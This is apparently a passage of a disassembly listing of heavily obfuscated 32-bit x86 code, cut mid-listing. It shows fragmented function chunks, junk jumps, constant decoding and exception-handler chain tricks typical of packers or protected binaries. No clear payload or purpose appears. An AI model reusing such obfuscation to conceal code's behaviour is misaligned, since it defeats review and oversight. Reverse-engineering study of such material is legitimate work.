jmp loc_42590E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426455
loc_427491: ; CODE XREF: sub_426455:loc_425B91�j
push offset loc_42EBFE
jmp nullsub_33
; END OF FUNCTION CHUNK FOR sub_426455
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42749B: ; CODE XREF: sub_42B15E-434E�j
jz loc_42353F
cmp ebx, edi
jmp loc_4290D4
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
rol ebx, 1Eh
jmp sub_4280B6
; ---------------------------------------------------------------------------
loc_4274B0: ; DATA XREF: sub_427762+647D�o
push 3E7C3FEAh
pop eax
push offset loc_42D485
jmp locret_42862E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_4274C0: ; CODE XREF: sub_424707:loc_429B1E�j
xor ebp, ebx
sub eax, 600FC43Ch
loc_4274C8: ; DATA XREF: sub_424E6E+4D14�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
cmp ecx, edx
pop ecx
xchg ecx, [esp-8+arg_4]
jmp loc_423A1D
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428718
loc_4274DD: ; CODE XREF: sub_428718:loc_42EA8E�j
push eax
; END OF FUNCTION CHUNK FOR sub_428718
; START OF FUNCTION CHUNK FOR sub_42E395
loc_4274DE: ; CODE XREF: sub_42E395-4780�j
call sub_4230AC
; END OF FUNCTION CHUNK FOR sub_42E395
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4274E3: ; CODE XREF: sub_42798F+3B35�j
jmp nullsub_86
; ---------------------------------------------------------------------------
loc_4274E8: ; CODE XREF: sub_42798F+D50�j
jmp loc_425C94
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42771F
loc_4274ED: ; CODE XREF: sub_42771F+C�j
jmp nullsub_228
; END OF FUNCTION CHUNK FOR sub_42771F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_4274F2: ; CODE XREF: sub_4253F4+464B�j
adc ecx, eax
loc_4274F4: ; CODE XREF: _0182ofla:loc_42911F�j
call sub_42EA15
push offset sub_425629
jmp nullsub_168
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_427503 proc near ; CODE XREF: sub_426240+7988�j
retn
sub_427503 endp
; ---------------------------------------------------------------------------
loc_427504: ; CODE XREF: _0182ofla:0042965A�j
jmp loc_423997
; ---------------------------------------------------------------------------
loc_427509: ; CODE XREF: _0182ofla:loc_428820�j
call sub_428D17
jo loc_427465
mov edx, 0A22F8A70h
call sub_42B097
mov ds:dword_42A398, eax
jmp loc_42C5BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_427528: ; CODE XREF: sub_428AC9:loc_4264B3�j
popf
xchg eax, [esp-4+arg_0]
push 10h
mov eax, [ebp-8]
call sub_428AB5
; END OF FUNCTION CHUNK FOR sub_428AC9
; START OF FUNCTION CHUNK FOR sub_427445
loc_427536: ; CODE XREF: sub_427445+5D05�j
jmp loc_42ED54
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
loc_42753B: ; CODE XREF: _0182ofla:00426FEE�j
jmp sub_4278DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_427540: ; CODE XREF: sub_427239+5570�j
pop edi
sub edi, 1A2BD1F4h
jnb loc_424F8C
; END OF FUNCTION CHUNK FOR sub_427239
; START OF FUNCTION CHUNK FOR sub_425629
loc_42754D: ; CODE XREF: sub_425629+5743�j
jmp sub_42D1AE
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
ror eax, 7
jmp loc_42DCBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42755A: ; CODE XREF: sub_425B6E-2840�j
rol eax, 7
jb loc_424CC5
loc_427563: ; CODE XREF: sub_42E282+12�j
jmp loc_42B83D
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_427568: ; CODE XREF: sub_428D63-9AE�j
jmp loc_42C50A
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42756D: ; CODE XREF: sub_42798F-1143�j
jmp nullsub_110
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_427572: ; CODE XREF: sub_42E689-8F82�j
jmp loc_4282D6
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
and esi, edi
jmp loc_424CC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42757E: ; CODE XREF: sub_425B6E:loc_428825�j
xchg eax, ebp
push ebp
xchg eax, ebp
loc_427583: ; CODE XREF: sub_42AAF8-4F8F�j
call sub_42DBF0
push edi
push 8B81933h
jmp loc_4242E7
; END OF FUNCTION CHUNK FOR sub_425B6E
; =============== S U B R O U T I N E =======================================
sub_427593 proc near ; DATA XREF: _0182ofla:00428C0E�o
push offset loc_42C4FC
jmp nullsub_237
sub_427593 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_42759E: ; CODE XREF: sub_426319+88A6�j
jmp loc_4284CB
; END OF FUNCTION CHUNK FOR sub_426319
; =============== S U B R O U T I N E =======================================
sub_4275A3 proc near ; DATA XREF: sub_427445+43AA�o
xchg ecx, [esp+0]
jmp sub_428D17
sub_4275A3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_4275AB: ; CODE XREF: sub_42537E:loc_426A3E�j
add eax, 0DD457BB0h
loc_4275B1: ; CODE XREF: _0182ofla:004248A3�j
add eax, ebp
call sub_42B860
; END OF FUNCTION CHUNK FOR sub_42537E
; START OF FUNCTION CHUNK FOR sub_42DC1F
loc_4275B8: ; CODE XREF: sub_42DC1F+3�j
jmp loc_4279C3
; END OF FUNCTION CHUNK FOR sub_42DC1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_4275BD: ; CODE XREF: sub_42966F-2C7C�j
jmp loc_4252F6
; END OF FUNCTION CHUNK FOR sub_42966F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42945B
loc_4275C2: ; CODE XREF: sub_42945B-2D8F�j
jmp nullsub_231
; END OF FUNCTION CHUNK FOR sub_42945B
; ---------------------------------------------------------------------------
or ebp, 75AC3BCDh
jb loc_42DE9E
jmp sub_42A241
; ---------------------------------------------------------------------------
mov edx, 0BE8CE1B7h
call sub_42D935
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_4275E2: ; CODE XREF: sub_425DA5+57F7�j
test al, al
jz loc_42A1B0
jmp loc_4248F3
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
locret_4275EF: ; CODE XREF: _0182ofla:loc_424B47�j
retn
; ---------------------------------------------------------------------------
locret_4275F0: ; CODE XREF: _0182ofla:loc_42E4BD�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_4275F1: ; CODE XREF: sub_429BEC+1C�j
jmp loc_42A125
; END OF FUNCTION CHUNK FOR sub_429BEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_4275F6: ; CODE XREF: sub_42662C-3F1�j
add esi, 0E8731D3Bh
mov [esi], eax
pop esi
cmp dword ptr [ebp-4], 0
jz loc_423F31
mov eax, [ebp-4]
jmp loc_42CD04
; END OF FUNCTION CHUNK FOR sub_42662C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_427611: ; CODE XREF: sub_4291BA-441D�j
adc edx, 66915718h
pushf
loc_427618: ; DATA XREF: sub_42E689-639D�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
jmp loc_4237F9
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
loc_427627: ; CODE XREF: _0182ofla:00428309�j
jle loc_42DC40
; =============== S U B R O U T I N E =======================================
sub_42762D proc near ; CODE XREF: _0182ofla:004285C9�p
mov [esp+0], edi
pop edi
call sub_42D71D
push ebp
mov [esp+0], eax
sub_42762D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42763A: ; CODE XREF: sub_423FCD:loc_42D42A�j
ror eax, 9
push esi
jmp loc_423198
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_427643: ; DATA XREF: sub_42D1AE+4�o
mov esp, ebp
pop ebp
mov eax, dword ptr ds:loc_426FAC
or eax, eax
jnz loc_42B450
call sub_428D17
mov edx, 95918C9Dh
jmp loc_42AC7F
; ---------------------------------------------------------------------------
loc_427663: ; DATA XREF: sub_4289E4+38AB�o
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
; START OF FUNCTION CHUNK FOR sub_42561D
loc_42766D: ; CODE XREF: sub_42C2F0:loc_429304�j
; sub_42561D+8C4B�j
jb loc_42503E
push offset sub_425EA5
jmp loc_4284C1
; END OF FUNCTION CHUNK FOR sub_42561D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42912B
loc_42767D: ; CODE XREF: _0182ofla:loc_426374�j
; sub_42912B+D�j
call sub_42883C
loc_427682: ; CODE XREF: sub_423461+19�j
; sub_4255BB+E�j
jmp nullsub_52
; END OF FUNCTION CHUNK FOR sub_42912B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B53
loc_427687: ; CODE XREF: sub_423B53+E�j
jmp loc_42A781
; END OF FUNCTION CHUNK FOR sub_423B53
; =============== S U B R O U T I N E =======================================
sub_42768C proc near ; CODE XREF: sub_428A39:loc_427D55�p
; sub_42B15E+2B80�j
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00429348 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C2D9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042D250 SIZE 0000000E BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-14h]
call sub_4238F9
loc_427698: ; DATA XREF: sub_427E81+5�o
pushf
push 6AA7160Ah
pop edx
rol edx, 10h
add edx, 57D18B14h
xor edx, 0F1B9307Bh
popf
jmp loc_429348
sub_42768C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_4276B4: ; CODE XREF: sub_42A642:loc_428668�j
jz loc_42CDBF
jmp loc_4254CE
; END OF FUNCTION CHUNK FOR sub_42A642
; =============== S U B R O U T I N E =======================================
sub_4276BF proc near ; DATA XREF: sub_42393D+9�o
; FUNCTION CHUNK AT 00423107 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004248F9 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00424C24 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426D0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429966 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A1AB SIZE 00000005 BYTES
add eax, 38C04F32h
mov eax, [eax]
mov edx, [ebp-4]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 100h
jnz loc_426D0D
jmp loc_42A1AB
sub_4276BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4276E3 proc near ; CODE XREF: _0182ofla:00423CBF�j
; sub_423A2A+9108�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424857 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428080 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
xchg edx, [esp-4+arg_0]
mov edi, edx
pop edx
jmp loc_424857
sub_4276E3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9A5
loc_4276F2: ; CODE XREF: sub_42E9A5+1A4�j
test esi, 5862D158h
jmp loc_427FDA
; END OF FUNCTION CHUNK FOR sub_42E9A5
; ---------------------------------------------------------------------------
locret_4276FD: ; CODE XREF: _0182ofla:loc_425DC0�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_4276FE: ; CODE XREF: sub_427259+6�j
jmp loc_42CBC3
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_427703: ; CODE XREF: sub_425B6E+13�j
jmp loc_42A818
; END OF FUNCTION CHUNK FOR sub_425B6E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_244. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_42770A: ; CODE XREF: sub_42C718-2AB�j
push offset sub_424254
jmp nullsub_243
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
test edi, 0AB1D7ACEh
jmp loc_42DB28
; =============== S U B R O U T I N E =======================================
sub_42771F proc near ; CODE XREF: _0182ofla:004232AA�j
; _0182ofla:loc_42E9CC�p
; FUNCTION CHUNK AT 004274ED SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-4]
push offset loc_42C5FB
jmp loc_4274ED
sub_42771F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_427730: ; CODE XREF: sub_42A181:loc_42DCFB�j
jnz loc_424D39
jmp loc_42A61B
; END OF FUNCTION CHUNK FOR sub_42A181
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E43C
loc_42773B: ; CODE XREF: sub_42E43C-77D1�j
js loc_42D62E
mov ebp, 1073A9A1h
; END OF FUNCTION CHUNK FOR sub_42E43C
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_427746: ; CODE XREF: sub_423FE2:loc_423E4A�j
jmp loc_42A670
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
jmp loc_424785
; =============== S U B R O U T I N E =======================================
sub_427750 proc near ; CODE XREF: sub_42C2CC+12A5�j
; FUNCTION CHUNK AT 0042C890 SIZE 00000005 BYTES
add esp, 0FFFFFFF0h
call sub_428D17
push offset loc_424AE9
jmp loc_42C890
sub_427750 endp
; =============== S U B R O U T I N E =======================================
sub_427762 proc near ; CODE XREF: _0182ofla:00426883�j
; _0182ofla:004277F0�p
; FUNCTION CHUNK AT 0042A2DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DBD8 SIZE 00000011 BYTES
mov [esp+0], eax
pop eax
mov al, 1
shl al, cl
mov edx, [ebp-1Ch]
shr edx, 3
mov ecx, ds:dword_423190
jmp loc_42DBD8
sub_427762 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5EF
loc_42777C: ; CODE XREF: sub_42C5EF+1�j
jmp loc_428197
; END OF FUNCTION CHUNK FOR sub_42C5EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_427781: ; CODE XREF: sub_42A420+208D�j
jmp loc_428079
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E282
loc_427786: ; CODE XREF: sub_42E282-6246�j
sub ecx, 94C3E200h
add ecx, 5A3D2AF3h
call sub_425A3C
; END OF FUNCTION CHUNK FOR sub_42E282
; =============== S U B R O U T I N E =======================================
sub_427797 proc near ; CODE XREF: _0182ofla:0042563F�j
; sub_424E6E:loc_427F9A�p
; FUNCTION CHUNK AT 00426662 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427281 SIZE 0000000A BYTES
mov [esp+0], ecx
pop ecx
push ebx
push 4E8CF02Eh
pop ebx
add ebx, 0B1B59BD5h
jmp loc_426662
sub_427797 endp
; ---------------------------------------------------------------------------
loc_4277AD: ; CODE XREF: _0182ofla:004237F4�j
jmp loc_42C874
; ---------------------------------------------------------------------------
loc_4277B2: ; CODE XREF: _0182ofla:00425CD1�j
jns loc_42E02C
call sub_423FCD
test al, al
jz loc_428285
jmp loc_42A926
; ---------------------------------------------------------------------------
loc_4277CA: ; CODE XREF: _0182ofla:0042325F�j
jp loc_42CFD2
; =============== S U B R O U T I N E =======================================
sub_4277D0 proc near ; CODE XREF: sub_423FFB+9�p
mov [esp+0], edi
pop edi
xor eax, eax
call sub_424289
adc edx, 0E7D05C81h
jmp sub_4290AE
sub_4277D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4277E6: ; CODE XREF: _0182ofla:loc_4268D3�j
; _0182ofla:004268DD�j
add ebx, 48000006h
popf
and ecx, ebx
pop ebx
call sub_427762
; START OF FUNCTION CHUNK FOR sub_4272E4
loc_4277F5: ; CODE XREF: sub_4272E4+5�j
jmp nullsub_153
; END OF FUNCTION CHUNK FOR sub_4272E4
; =============== S U B R O U T I N E =======================================
sub_4277FA proc near ; CODE XREF: sub_42660C-6C6�p
; sub_42326C+ADFE�j
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
xchg eax, [esp-4+arg_0]
retn
sub_4277FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427802 proc near ; DATA XREF: sub_42660C-6CB�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042D7F0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042DD7C SIZE 00000008 BYTES
add eax, 93612605h
push eax
pushf
push 0F2ECAEBAh
jmp loc_42D7F0
sub_427802 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_427814: ; CODE XREF: sub_4253F4+F�j
jz loc_42D623
jmp loc_429BC9
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F35
loc_42781F: ; CODE XREF: sub_424F35+C�j
xor eax, 31C3E2EEh
add eax, ebp
call sub_4269FA
xchg ebx, edi
popf
jmp sub_425A5C
; END OF FUNCTION CHUNK FOR sub_424F35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E178
loc_427834: ; CODE XREF: sub_42E178:loc_42E17E�j
jnz loc_42EA4E
retn
; END OF FUNCTION CHUNK FOR sub_42E178
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42783B: ; CODE XREF: sub_428729+3E5C�j
jmp loc_42C950
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BED
loc_427840: ; CODE XREF: sub_425BED:loc_42EA4E�j
cmp dword ptr [eax], 0FFFFFFFFh
push offset sub_42913D
jmp loc_42E070
; END OF FUNCTION CHUNK FOR sub_425BED
; ---------------------------------------------------------------------------
loc_42784D: ; CODE XREF: _0182ofla:00425FEA�j
add eax, 0CCC78AFBh
push esi
mov [esp], eax
mov eax, [ebp-14h]
jmp loc_42D0F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466B
loc_42785F: ; CODE XREF: sub_42466B:loc_426747�j
pop edx
pop ebp
; END OF FUNCTION CHUNK FOR sub_42466B
; START OF FUNCTION CHUNK FOR sub_428F20
loc_427861: ; CODE XREF: sub_428F20:loc_428C1C�j
jmp loc_42930E
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_427866: ; CODE XREF: sub_428C7D-75D�j
shl ebx, 15h
or eax, 0ED5CA262h
push edx
push 43FE08E1h
pop edx
jmp loc_42E103
; END OF FUNCTION CHUNK FOR sub_428C7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426851
loc_42787B: ; CODE XREF: sub_426851:loc_429821�j
xchg esi, [esp+10h+var_10]
push 0
call sub_425C9C
loc_427885: ; CODE XREF: _0182ofla:loc_42C95F�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 0A0h
mov dword ptr [ecx], offset loc_429881
xor eax, eax
jmp loc_42C341
; END OF FUNCTION CHUNK FOR sub_426851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4278AA: ; CODE XREF: sub_42660C:loc_4278E5�j
shr edx, 0Ah
jmp loc_4271EF
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_4278B2: ; CODE XREF: sub_425C89:loc_427159�j
pop ecx
mov eax, ds:dword_426FB4
or eax, eax
jnz loc_42722F
jmp loc_42AEF7
; END OF FUNCTION CHUNK FOR sub_425C89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_4278C7: ; CODE XREF: sub_423127+57AB�j
jmp loc_42EC53
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_4278CC: ; CODE XREF: sub_4230C4+5�j
mov ebp, offset nullsub_6
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_428F46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_4278D6: ; CODE XREF: sub_426020-2D30�j
jmp loc_42D703
; END OF FUNCTION CHUNK FOR sub_426020
; =============== S U B R O U T I N E =======================================
sub_4278DB proc near ; CODE XREF: _0182ofla:loc_42753B�j
; sub_42CA29-26DE�p ...
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00427186 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004291DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042AD2E SIZE 00000005 BYTES
call sub_42D5EF
loc_4278E0: ; CODE XREF: sub_42448C+64A5�j
jmp loc_427186
sub_4278DB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4278E5: ; CODE XREF: sub_42660C+311C�j
jmp loc_4278AA
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6D5
loc_4278EA: ; CODE XREF: sub_42A6D5-5BFD�j
jmp loc_429E96
; END OF FUNCTION CHUNK FOR sub_42A6D5
; ---------------------------------------------------------------------------
locret_4278EF: ; CODE XREF: _0182ofla:0042EC71�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D02D
loc_4278F0: ; CODE XREF: sub_42D02D-99AF�j
or edi, esi
loc_4278F2: ; DATA XREF: sub_42B15E:loc_42AEB1�o
pop dword ptr fs:0
xchg eax, [esp-4+arg_0]
pop eax
call sub_42E282
jmp loc_42B58D
; END OF FUNCTION CHUNK FOR sub_42D02D
; =============== S U B R O U T I N E =======================================
sub_427906 proc near ; CODE XREF: _0182ofla:00424A9B�j
; sub_427942-CAA�p
; FUNCTION CHUNK AT 00423CB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DB49 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042DD1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E2C5 SIZE 0000001D BYTES
mov [esp+0], esi
pop esi
mov ecx, [eax]
add eax, 4
mov ebx, [eax]
add eax, 4
mov edi, [eax]
loc_427916: ; CODE XREF: _0182ofla:loc_4288A9�j
jmp loc_42AF57
sub_427906 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42791B: ; CODE XREF: sub_426571-31C�j
test al, al
jnz loc_4262D2
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_423C0A
jmp loc_42D158
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
jge loc_426D18
not eax
jmp sub_42E395
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427942 proc near ; DATA XREF: sub_4272F4+5B2B�o
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_8 = byte ptr -8
; FUNCTION CHUNK AT 00423372 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252D7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426798 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426C82 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004287A3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004294BC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042ABBD SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0042AD86 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042D4CC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D4E1 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
push ebp
jmp loc_426C82
sub_427942 endp
; =============== S U B R O U T I N E =======================================
sub_42794C proc near ; CODE XREF: sub_427942+3446�p
xchg eax, [esp+0]
mov eax, [esp+0]
call sub_427AD5
call sub_4290AE
loc_42795C: ; CODE XREF: sub_42D9A4-21EF�j
jmp loc_426B6F
sub_42794C endp
; ---------------------------------------------------------------------------
loc_427961: ; CODE XREF: _0182ofla:0042A482�j
jnb loc_42B4FE
; =============== S U B R O U T I N E =======================================
sub_427967 proc near ; CODE XREF: _0182ofla:0042B06E�p
; FUNCTION CHUNK AT 00423D78 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-4]
jns loc_423D78
add eax, 28h
jmp loc_42CC24
sub_427967 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42797C: ; CODE XREF: _0182ofla:0042AC98�j
; _0182ofla:loc_42EBC4�j
call sub_423FCD
test al, al
jz loc_425D09
jmp loc_42A5C7
; ---------------------------------------------------------------------------
loc_42798E: ; CODE XREF: _0182ofla:0042C3DE�j
popf
; =============== S U B R O U T I N E =======================================
sub_42798F proc near ; CODE XREF: sub_427942:loc_42ABDF�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423286 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004236F0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423C61 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423F2D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004240A3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004240EF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004243A7 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004244E9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004247E7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004249A0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424A02 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424B57 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00424BA1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424BFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E46 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424ED2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424EFA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00425315 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004255AA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042564E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004257F8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042591C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425B22 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425C23 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425C6E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00425C94 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425ECF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426069 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426397 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042665D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426836 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004269BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426B9B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426CD2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426D18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042701B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004270F9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042721A SIZE 00000005 BYTES
